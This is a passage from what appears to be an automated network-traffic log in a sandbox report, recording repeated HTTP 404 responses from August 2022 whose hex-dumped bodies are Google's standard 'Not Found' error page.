6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:06 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:10 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:12 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:23 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:26 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:28 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1576Date: Fri, 05 Aug 2022 07:10:40 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 